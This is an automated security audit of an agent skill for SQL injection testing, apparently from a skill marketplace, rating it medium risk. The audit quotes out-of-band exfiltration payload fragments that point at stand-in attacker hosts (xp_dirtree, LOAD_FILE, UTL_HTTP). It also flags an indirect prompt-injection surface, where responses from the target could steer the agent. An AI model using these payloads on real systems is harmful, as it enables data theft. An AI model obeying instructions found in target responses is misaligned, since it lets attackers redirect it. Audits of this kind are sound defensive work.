sql-injection-testing
Warn
Audited by Gen Agent Trust Hub on Mar 29, 2026
Risk Level: MEDIUMDATA_EXFILTRATIONEXTERNAL_DOWNLOADSCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [DATA_EXFILTRATION]: The skill contains Out-of-Band (OOB) SQL injection payloads explicitly designed to exfiltrate database information to external, non-whitelisted domains.
- Evidence: Payloads in SKILL.md use
xp_dirtreetargeting\\attacker-server.com\share,LOAD_FILEtargeting@@version.attacker.com, andUTL_HTTP.REQUESTtargetinghttp://attacker.com/. - [EXTERNAL_DOWNLOADS]: The technical requirements mandate the use of
SQLMap, an external automated exploitation tool. Relying on external, non-standard tooling for exploitation increases the risk of automated malicious activity and unverifiable dependency execution. - [COMMAND_EXECUTION]: The workflow describes the generation and execution of raw SQL commands, including query stacking and system stored procedure calls (e.g.,
EXEC master..xp_dirtree). These commands are intended to manipulate database behavior and can lead to unauthorized data access or system compromise. - [PROMPT_INJECTION]: The skill identifies various user-controlled inputs, such as URL parameters, HTTP headers, and cookies, as target injection points. This creates a surface for Indirect Prompt Injection, where untrusted data returned from a target web application could influence the agent's logic or subsequent actions.
- Ingestion points: Web application parameters, HTTP headers (User-Agent, Referer), and cookie values.
- Boundary markers: Absent; no specific instructions are provided to the agent to ignore or sanitize embedded instructions within target responses.
- Capability inventory: The agent is instructed to use SQLMap and manually craft/execute SQL payloads across various database engines.
- Sanitization: No sanitization or validation of the untrusted target data is described before the agent processes it.
Audit Metadata